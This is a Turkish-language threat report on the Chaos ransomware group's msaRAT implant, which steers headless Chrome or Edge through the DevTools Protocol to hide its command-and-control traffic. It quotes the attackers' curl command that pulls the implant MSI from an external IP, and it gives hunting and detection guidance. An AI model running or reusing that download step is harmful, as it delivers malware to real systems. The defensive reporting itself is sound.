Giriş
Chaos fidye yazılım grubu, hedeflerinin kendi tarayıcıları üzerinden komut ve kontrol yapısını kurarak dikkat çekici bir saldırı gerçekleştirmiştir. Bu durum, tarayıcıların siber güvenlikteki rolünün ne kadar kritik olduğunu bir kez daha gözler önüne sermektedir.
Saldırı Nasıl Çalışıyor?
Cisco Talos, bu saldırının arkasındaki Rust tabanlı implant olan msaRAT‘ı detaylandırdı. Bu implant, etkilenen Windows bilgisayarında çalışarak, kendi başına dışa bağlantı kurmadan, 127.0.0.1 adresi ile iletişim kurar. Ana saldırı ise Chrome veya Edge’in headless modda başlatılmasıyla gerçekleşir ve tarayıcı, Chrome DevTools Protocol kullanılarak kontrol edilir.
Etkilenen Sistemler
Bu saldırı, genel olarak aşağıdaki sistemleri etkilemektedir:
- Windows işletim sistemleri
- Google Chrome
- Microsoft Edge
Çözüm ve Korunma
Saldırının başlatılması için msaRAT implantı, hedef bilgisayara yüklenir ve ardından şifreleyici çalışmaya başlamadan önce etkisini gösterir. Cisco Talos’un açıkladığına göre saldırganın sistemi ele geçirmek için kullandığı yöntemler arasında:
- Spam saldırıları
- Vishing (sesli dolandırıcılık)
- Quick Assist uygulaması
- Uzaktan erişim yönetim (RMM) araçları
Aynı zamanda, implant bir curl komutuyla indirilir:
curl.exe https://172.86.126[.]18:443/update_ms.msi -o C:programdataupdate_ms.msi
Bu yapılandırma, özellikle port 443 üzerinden düzgün biçimde kontrollere takılmadan geçmesine neden olur. Ayrıca, implant, dinamik bir DLL yükleyerek sistemde hedefe injectable bir durum yaratır.
Hunting Notes
Saldırının tespit edilmesi, süreç davranışlarına dayalı bir yaklaşım gerektirir. Cisco Talos’a göre, tüm dış iletişimler geçerli bir tarayıcı süreci olarak gözlemlenir. Bu nedenle, aşağıdaki kriterlerle sistemlerde arama yapılmalıdır:
- Tarayıcıları başlatan bir
installer,serviceveya başka bir ebeveyn süreç ile ilişkilendirme yapılmalıdır. - Tarayıcının –headless=new ve –remote-debugging-port ile çalıştığı süreçler incelenmelidir.
- Debugging portuna giden döngüsel trafiği ve dışa WebRTC bağlantılarını takip edilmelidir.
Bu süreçte, özel işareti sağlayan öğeler arasında Runtime.addBinding ve Runtime.evaluate bulunmaktadır.
Sonuç
Okuyucular, sistemlerinde bu tür bir tehdidin önlenmesi amacıyla aşağıdaki adımları atmalıdır:
- Yazılımlarını güncelleyerek güvenlik açıklarını kapatmalıdır.
- Ağ güvenlik duvarlarındaki port ayarlarını gözden geçirmelidir.
- Legitimite dışındaki Chrome veya Edge süreçlerini izlemelidir.
Unutulmamalıdır ki, msaRAT tarayıcı güvenlik açıklarına dayanmadığı için, mevcut bir tarayıcı güncellemesi ile önlenemez. Süreç davranışlarını takip etmek, saldırının erken aşamalarında tespit edilmesi için kritik öneme sahiptir.


